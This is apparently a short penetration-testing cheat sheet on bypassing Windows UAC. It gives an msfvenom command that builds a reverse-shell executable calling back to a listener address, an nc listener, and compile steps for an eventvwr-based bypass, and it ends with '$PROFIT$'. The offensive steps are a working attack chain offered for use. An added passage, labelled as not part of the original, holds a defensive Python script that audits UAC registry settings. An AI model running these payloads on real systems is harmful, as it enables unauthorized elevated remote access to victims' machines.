UAC Bypass

  • Check the UAC settings:

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
/root/uac-bypass.exe
  • Create the payload to get a reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.241 LPORT=443 -f exe > shell.exe
  • Copy shell.exe over to the victim as well, and make sure both files are in the same directory

nc -nvlp 443
  • $PROFIT$
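
The registry check in the first step, seen from the defender's side, as an added example (not part of the original page): a Python script that parses saved `reg query` output for this key and reports UAC settings that leave elevation unprompted. The sample output is constructed, and treating a missing value as the Windows default is an assumption of this example.

```python
import re

# Constructed sample of `reg query` output for the key above (Windows default values).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    legalnoticecaption    REG_SZ
"""

DWORD_LINE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$")

def parse_dwords(text):
    """Return {value_name: int} for every REG_DWORD line in `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = DWORD_LINE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values

def audit_uac(text):
    """Return a list of weak UAC settings; an empty list means none were found."""
    v = parse_dwords(text)
    # Assumption: a value missing from the output is treated as the Windows default.
    if v.get("EnableLUA", 1) == 0:
        return ["EnableLUA=0: UAC is off, administrators run with a full token"]
    findings = []
    admin = v.get("ConsentPromptBehaviorAdmin", 5)
    if admin == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: elevation happens without any prompt")
    elif admin == 5:
        findings.append("ConsentPromptBehaviorAdmin=5: default level, auto-elevating Windows "
                        "binaries run elevated without a prompt; set 2 (consent) or 1 (credentials)")
    if v.get("PromptOnSecureDesktop", 1) == 0:
        findings.append("PromptOnSecureDesktop=0: prompts are shown on the user desktop")
    return findings

if __name__ == "__main__":
    for finding in audit_uac(SAMPLE) or ["No weak UAC setting found"]:
        print(finding)
```

ConsentPromptBehaviorAdmin set to 2 with PromptOnSecureDesktop at 1 corresponds to the "Always notify" slider position, where Windows binaries no longer elevate silently.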

From Scratch

strcat(curPath, "\\foobar.exe");
  • Change foobar.exe to whatever you named your msfvenom payload

  • Compile

x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o uac-bypass.exe
  • Follow the steps above to transfer and run
